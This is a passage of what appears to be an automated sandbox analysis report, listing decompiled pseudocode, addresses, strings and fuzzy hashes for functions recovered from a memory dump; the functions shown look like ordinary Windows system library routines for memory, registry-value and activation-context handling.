				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03889730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0390A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0390A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3938b04 >> 0x14) + (_v44 -  *0x3938b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03867D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0390138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03867D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E038FFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3938724 & 0x00000008) != 0) {
						E039052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E039115B5(0x3938ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x03910eb7
0x03910eb9
0x03910ec0
0x03910ec2
0x03910ecd
0x0391105b
0x0391105b
0x03911061
0x03911066
0x03911066
0x0391106b
0x03911073
0x03911073
0x03910ed3
0x03910ed6
0x03910edc
0x03910ee0
0x03910ee7
0x03910ef0
0x03910ef5
0x03910efa
0x03910efc
0x03910efd
0x03910f03
0x03910f04
0x03910f06
0x03910f07
0x03910f09
0x03910f0e
0x03910f14
0x03910f23
0x03910f2d
0x03910f34
0x03910f34
0x03910f14
0x03910f52
0x00000000
0x00000000
0x03910f58
0x03910f73
0x03910f74
0x03910f79
0x03910f7d
0x03910f80
0x03910f86
0x03910fab
0x03910fb5
0x03910fc6
0x03910fd1
0x03910fe3
0x03910fd3
0x03910fdc
0x03910fdc
0x03910feb
0x03911009
0x03911009
0x03911015
0x03911027
0x03911017
0x03911020
0x03911020
0x0391102f
0x0391103c
0x0391103c
0x03911048
0x03911050
0x03911050
0x03911055
0x00000000
0x03911055
0x03910f88
0x03910f9e
0x03910fa2
0x03910fa9
0x00000000
0x00000000
0x00000000
0x03910fa9
0x00000000

Strings

`, xrefs: 03910F16

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 1fbcf39549f7709a06437484b4ad0abef900d0c3161a9cf32406b80aceb9707d
Instruction ID: 75b226aedf22725d2cae09dc5c4d5e2c45e3301ac0752bfd8735f9f83a85689c
Opcode Fuzzy Hash: 1fbcf39549f7709a06437484b4ad0abef900d0c3161a9cf32406b80aceb9707d
Instruction Fuzzy Hash: 8851E1706083469FD325DF29D880B1BB7E9EBC4344F08092CFA86AB390D771E855CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0387F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0387F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03864120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03889830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03889990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E038895D0();
							goto L11;
						} else {
							_t109 = L03864620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0388F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E038895D0();
										L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0387f0d3
0x0387f0d9
0x0387f0e0
0x0387f0e7
0x0387f0f2
0x0387f0f4
0x0387f0f8
0x0387f100
0x0387f108
0x0387f10d
0x0387f115
0x0387f116
0x0387f11f
0x0387f123
0x0387f124
0x0387f12c
0x0387f130
0x0387f134
0x0387f13d
0x0387f144
0x0387f14b
0x0387f152
0x038bbab0
0x038bbab0
0x0387f158
0x0387f158
0x0387f15a
0x0387f160
0x0387f165
0x0387f166
0x0387f16f
0x0387f173
0x038bbaa7
0x038bbaa7
0x038bbaab
0x00000000
0x0387f179
0x0387f18d
0x0387f191
0x038bbaa2
0x00000000
0x0387f197
0x0387f19b
0x0387f1a2
0x0387f1a9
0x0387f1af
0x0387f1b2
0x0387f1b6
0x0387f1b9
0x0387f1c4
0x0387f1d8
0x0387f1df
0x0387f1e3
0x0387f1eb
0x0387f1ee
0x0387f1f4
0x0387f20f
0x038bbab7
0x038bbabb
0x038bbacc
0x038bbad1
0x0387f215
0x0387f218
0x0387f226
0x0387f22b
0x00000000
0x0387f22b
0x0387f1f6
0x0387f1f6
0x0387f1f9
0x0387f1fb
0x0387f1fb
0x0387f1f4
0x0387f191
0x0387f173
0x0387f152
0x0387f203

Strings

@, xrefs: 0387F124

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: f27aa5c24fb5ef8ffac4e95759d2c6d21ab2f55cc6e44f351f0b1ff5bd423434
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 0D518A755017119FC321DFA9C840A6BBBF9FF48710F108969FA95CB690E7B4E904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 038C3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E038C3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x393d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03880BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E038C3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0388FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E038C3540;
						E0388FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0389DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E038D0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E038897C0();
					}
					return E0388B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E038C3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E038C3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0388FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03889650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E038C3787(_a4,  &_v352, _t80);
						}
					}
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E038895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x038c3552
0x038c355a
0x038c355d
0x038c3566
0x038c3567
0x038c357e
0x038c358f
0x038c35a1
0x038c35a5
0x038c366b
0x038c366b
0x038c366d
0x038c3672
0x038c3679
0x038c3685
0x038c368d
0x038c369d
0x038c36a7
0x038c36b8
0x038c36c6
0x038c36c7
0x038c36dc
0x038c36e1
0x038c36e7
0x038c36e9
0x038c36e9
0x038c3703
0x038c3703
0x038c35b5
0x038c35c0
0x038c35c4
0x00000000
0x00000000
0x038c35ca
0x038c35d7
0x038c35e2
0x038c35e6
0x038c35e8
0x038c35f5
0x038c35fa
0x038c3603
0x038c3604
0x038c3609
0x038c360a
0x038c3612
0x038c3613
0x038c361e
0x038c3622
0x038c3628
0x038c362f
0x038c362f
0x038c3636
0x038c3638
0x038c363b
0x038c3642
0x038c3642
0x038c3636
0x038c3657
0x038c3657
0x038c365c
0x038c3662
0x038c3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 038C358F

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 29a6eaa4bfc9bf3dce20ce5b5f4d930a366fa553f3b20095af00d2ff8d2290c0
Instruction ID: 0739e077bc74f79b158818ef654c8226fd7c284e0ebed0d02bb3a999d806cd4d
Opcode Fuzzy Hash: 29a6eaa4bfc9bf3dce20ce5b5f4d930a366fa553f3b20095af00d2ff8d2290c0
Instruction Fuzzy Hash: 6B4164B591026C9BDB21DB94CC80FEEB77CAB44714F0085E9E609EB240DB749E898F95

Uniqueness

Uniqueness Score: -1.00%

Function 038C3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E038C3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03889650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03864620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03889650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x038c3893
0x038c3896
0x038c3899
0x038c389f
0x038c38a0
0x038c38a4
0x038c38a9
0x038c38ac
0x038c38ad
0x038c38ae
0x038c38af
0x038c38b1
0x038c38b4
0x038c38bb
0x038c38bc
0x038c38bd
0x038c38c4
0x038c38c8
0x038c38ca
0x038c38ca
0x038c38d5
0x038c393e
0x038c3940
0x038c3942
0x038c3952
0x038c3954
0x038c3961
0x038c3961
0x038c3967
0x038c396e
0x038c396e
0x038c3947
0x038c394c
0x00000000
0x038c394c
0x038c38ea
0x038c38ee
0x038c38f8
0x038c38f9
0x038c38ff
0x038c3900
0x038c3902
0x038c3903
0x038c390b
0x038c390f
0x038c3950
0x00000000
0x038c3950
0x038c3915
0x038c391d
0x038c391d
0x038c3922
0x038c3926
0x00000000
0x038c3928
0x038c392b
0x038c392b
0x038c3935
0x038c3937
0x038c3937
0x00000000
0x038c3935
0x038c3926
0x038c38f0
0x00000000

Strings

BinaryName, xrefs: 038C38B4

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: ecf1a7d3ae5f61c5ca728249331f8bb51efec5a4df6fd57ffe85e45ff41bd00e
Instruction ID: 3a9194171ee46ff5137d78d2ddd55695e651f9d54eaec33588dc4ae682ee5c4a
Opcode Fuzzy Hash: ecf1a7d3ae5f61c5ca728249331f8bb51efec5a4df6fd57ffe85e45ff41bd00e
Instruction Fuzzy Hash: E031023A910649AFDB15DA98C941D7BF778EB41720F0181ADE905EB240D774DE09C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0387D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0387D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x393d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03864120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0388B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E038898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E038895D0();
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0387d29c
0x0387d2a6
0x0387d2b1
0x0387d2b5
0x0387d2b6
0x0387d2bc
0x0387d2bd
0x0387d2be
0x0387d2bf
0x0387d2c2
0x0387d2c4
0x0387d2cc
0x0387d384
0x0387d34b
0x0387d34f
0x0387d350
0x0387d351
0x0387d35c
0x0387d35c
0x0387d2d6
0x0387d2da
0x0387d2e1
0x0387d361
0x0387d369
0x0387d36d
0x0387d2e3
0x0387d2e3
0x0387d2e3
0x0387d2e5
0x0387d2ed
0x0387d2f5
0x0387d2fa
0x0387d302
0x0387d303
0x0387d30b
0x0387d30f
0x0387d313
0x0387d318
0x0387d31c
0x0387d320
0x0387d379
0x0387d37d
0x00000000
0x00000000
0x038baffe
0x038bb001
0x038bb011
0x00000000
0x0387d322
0x0387d322
0x0387d330
0x0387d337
0x0387d35d
0x0387d339
0x0387d33f
0x0387d38c
0x0387d38c
0x0387d33f
0x0387d349
0x00000000
0x0387d349

Strings

@, xrefs: 0387D303

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: fd93092b24a35606454df624854ebc1af2e4956933540ba89b8d3b5d308251ec
Instruction ID: a0f1c0f0f0d324fa9e449c01812a7f8c922df3c0c8a58454978dee7d55c11b08
Opcode Fuzzy Hash: fd93092b24a35606454df624854ebc1af2e4956933540ba89b8d3b5d308251ec
Instruction Fuzzy Hash: 02318DB55083059FC711DFA8C9809ABBBE9EFC5658F0409AEF995C7210E634DD08CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 03851B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03851B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0388BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0388A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0388A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03864620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x03851b8f
0x03851b9a
0x03851b9c
0x03851b9e
0x03851ba3
0x038a7010
0x038a7010
0x00000000
0x03851ba9
0x03851ba9
0x03851bae
0x00000000
0x03851bc5
0x03851bca
0x03851bcf
0x03851bd0
0x03851bd1
0x03851bd2
0x03851bd6
0x03851bdc
0x03851be0
0x038a6ffc
0x038a7000
0x00000000
0x038a7006
0x038a7009
0x038a7009
0x03851be6
0x03851bec
0x03851c0b
0x03851c0b
0x03851c0c
0x03851c11
0x03851c12
0x03851c15
0x03851c1b
0x03851c1f
0x03851c31
0x03851c33
0x038a7026
0x038a7026
0x03851c21
0x03851c24
0x03851c24
0x03851bee
0x03851bee
0x03851bf2
0x03851c3a
0x03851bf4
0x03851bf4
0x03851c05
0x03851c05
0x03851c09
0x03851c3e
0x00000000
0x00000000
0x00000000
0x03851c09
0x03851bec
0x03851be0
0x03851bae
0x03851c2e

Strings

WindowsExcludedProcs, xrefs: 03851BC5

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: eaabcad1075dca1ece8f69498105a42cb9f4d6255223cafb3e782a32a056d0d3
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: FF21F236500628ABDF22DAD98848F6BB7ADAF81B54F0944E5FD14DB200D635DC01E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0386F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0386F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0386f71d
0x0386f722
0x0386f726
0x038b4770
0x0386f765
0x0386f769
0x0386f769
0x0386f732
0x038b477a
0x00000000
0x038b477a
0x0386f738
0x0386f73a
0x0386f73c
0x0386f73f
0x0386f746
0x0386f778
0x0386f7a9
0x0386f7a9
0x0386f754
0x0386f75a
0x0386f75d
0x0386f75f
0x0386f761
0x0386f76f
0x0386f771
0x0386f771
0x0386f76f
0x0386f763
0x00000000
0x0386f763
0x0386f77d
0x0386f7a3
0x0386f7a5
0x00000000
0x0386f7a5
0x0386f77f
0x0386f782
0x0386f784
0x0386f786
0x00000000
0x00000000
0x00000000
0x0386f788
0x0386f748
0x0386f74d
0x0386f78d
0x0386f793
0x0386f7b7
0x0386f7bc
0x00000000
0x0386f7bc
0x0386f798
0x00000000
0x00000000
0x0386f79d
0x0386f7b0
0x00000000
0x0386f7b0
0x0386f79f
0x00000000
0x0386f74f
0x0386f74f
0x00000000
0x0386f74f

Strings

Actx , xrefs: 0386F73F

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 162803c0e7db14755e8037ce14711717d953f91dde1f7e6e43132926f8358322
Instruction ID: 4b78646e0fb3286a8ac8c0784a53e4c25ea87cd25b543e368cd609234bb16d9e
Opcode Fuzzy Hash: 162803c0e7db14755e8037ce14711717d953f91dde1f7e6e43132926f8358322
Instruction Fuzzy Hash: 2811B6353046868BEB25CE9DA591B76B29ABB95628F2845FAE661CB391DB70C840C340

Uniqueness

Uniqueness Score: -1.00%

Function 038F8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E038F8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3920d50);
				E0389D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E038D5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
